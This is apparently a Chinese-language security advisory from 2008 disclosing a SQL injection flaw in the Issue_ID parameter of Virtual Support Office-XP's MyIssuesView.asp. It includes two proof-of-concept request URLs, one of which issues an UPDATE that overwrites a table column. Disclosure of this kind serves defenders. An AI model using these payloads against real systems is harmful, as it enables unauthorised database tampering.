发布日期：2008-03-13
更新日期：2008-03-17

受影响系统：

Advanced Data Solutions Virtual Support Office-XP 2

描述：

---

BUGTRAQ  ID: 28247

Virtual Support Office XP是基于Web的帮助台软件。

Virtual Support Office-XP（VSO-XP）的MyIssuesView.asp模块没有正确地验证对Issue_ID参数的输入便将其用到了SQL查询中，这允许远程攻击者通过提交特制的SQL查询请求执行SQL注入攻击。

<*来源：Aria-Security Team
  
  链接：http://secunia.com/advisories/29365/
        http://marc.info/?l=bugtraq&m=120544746208103&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.example.com/MyIssuesView.asp?Issue_ID=-1%20having%201=1--
http://www.example.com/MyIssuesView.asp?Issue_ID=-1 update QIssues set column='hacked';--

建议：

---

厂商补丁：

Advanced Data Solutions
-----------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.vso-xp.com/

浏览次数：2340
严重程度：0（网友投票）